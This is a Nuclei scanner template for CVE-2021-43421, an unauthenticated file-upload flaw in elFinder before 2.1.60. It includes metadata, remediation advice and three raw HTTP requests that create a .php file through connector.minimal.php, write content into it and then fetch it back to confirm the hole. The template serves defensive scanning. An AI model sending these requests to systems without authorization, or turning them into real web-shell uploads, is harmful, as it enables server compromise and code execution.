id: CVE-2021-43421 info: name: Studio-42 elFinder <2.1.60 - Arbitrary File Upload author: akincibor severity: critical description: | Studio-42 elFinder 2.0.4 to 2.1.59 is vulnerable to unauthenticated file upload via connector.minimal.php which could allow a remote user to upload arbitrary files and execute PHP code. remediation: | Upgrade to the latest version of Studio-42 elFinder plugin (2.1.60 or higher) to mitigate this vulnerability. reference: - https://github.com/Studio-42/elFinder/issues/3429 - https://twitter.com/infosec_90/status/1455180286354919425 - https://nvd.nist.gov/vuln/detail/CVE-2021-43421 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2021-43421 cwe-id: CWE-434 epss-score: 0.05774 epss-percentile: 0.92527 cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:* metadata: verified: true max-request: 3 vendor: std42 product: elfinder tags: cve,cve2021,elfinder,fileupload,rce,intrusive http: - raw: - | GET /elFinder/php/connector.minimal.php?cmd=mkfile&target=l1_Lw&name={{randstr}}.php:aaa HTTP/1.1 Host: {{Hostname}} Accept: */* - | GET /elFinder/php/connector.minimal.php?cmd=put&target={{hash}}&content={{randstr_1}} HTTP/1.1 Host: {{Hostname}} - | GET /elfinder/files/{{randstr}}.php%3Aaaa?_t= HTTP/1.1 Host: {{Hostname}} Accept: */* req-condition: true matchers: - type: dsl dsl: - 'contains(body_3, "{{randstr_1}}")' - "status_code == 200" condition: and extractors: - type: regex name: hash group: 1 regex: - '"hash"\:"(.*?)"\,' internal: true # digest: 4b0a004830460221008dacbcd54df692a85cfb01ba7cdce2f7c13e9e35d5088516d16fa8e5061a56f0022100e2029b72483325e5670be52cc3e3e7172363f860be9a64e98b28c6465cd7c658:922c64590222798bb761d5b6d8e72950